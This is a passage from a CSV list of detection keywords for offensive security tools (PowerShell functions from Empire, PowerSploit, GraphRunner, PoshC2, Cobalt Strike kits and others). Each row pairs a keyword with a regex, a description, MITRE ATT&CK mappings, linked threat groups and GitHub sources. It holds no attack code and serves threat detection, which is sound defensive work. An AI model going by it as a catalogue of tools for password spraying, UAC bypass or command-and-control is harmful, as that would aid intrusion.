Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*Invoke-DomainPasswordSpray*",".{0,1000}Invoke\-DomainPasswordSpray.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoke-DOSfuscation*",".{0,1000}Invoke\-DOSfuscation.{0,1000}","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","788","131","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Has the ability to download single files from SharePoint and OneDrive as the current user","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DriveFileDownload*",".{0,1000}Invoke\-DriveFileDownload.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DriverCoInstallersCheck*",".{0,1000}Invoke\-DriverCoInstallersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-DumpApps*",".{0,1000}Invoke\-DumpApps.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets app registrations and external enterprise apps along with consent and scope info","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DumpCAPS*",".{0,1000}Invoke\-DumpCAPS.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets conditional access policies","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Invoke-DumpOWAMailboxViaMSGraphApi*",".{0,1000}Invoke\-DumpOWAMailboxViaMSGraphApi.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*invoke-edrchecker*",".{0,1000}invoke\-edrchecker.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-EDRChecker*",".{0,1000}Invoke\-EDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*Invoke-EDRChecker.ps1*",".{0,1000}Invoke\-EDRChecker\.ps1.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*Invoke-EgressCheck*",".{0,1000}Invoke\-EgressCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EgressCheck.ps1*",".{0,1000}Invoke\-EgressCheck\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Empire *",".{0,1000}Invoke\-Empire\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*Invoke-Empire*",".{0,1000}Invoke\-Empire.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EndpointProtectionCheck*",".{0,1000}Invoke\-EndpointProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-EnumerateAzureBlobs.ps1*",".{0,1000}Invoke\-EnumerateAzureBlobs\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-EnumerateAzureSubDomains.ps1*",".{0,1000}Invoke\-EnumerateAzureSubDomains\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*invokeenumeratelocaladmin*",".{0,1000}invokeenumeratelocaladmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-EnvBypass*",".{0,1000}Invoke\-EnvBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EnvBypass.*",".{0,1000}Invoke\-EnvBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-EnvBypass.ps1*",".{0,1000}Invoke\-EnvBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EssessAgress*",".{0,1000}Invoke\-EssessAgress.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*invoke-eternalblue*",".{0,1000}invoke\-eternalblue.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-eventhunter*",".{0,1000}invoke\-eventhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-EventViewer *.exe*",".{0,1000}Invoke\-EventViewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*Invoke-EventViewer.ps1*",".{0,1000}Invoke\-EventViewer\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public 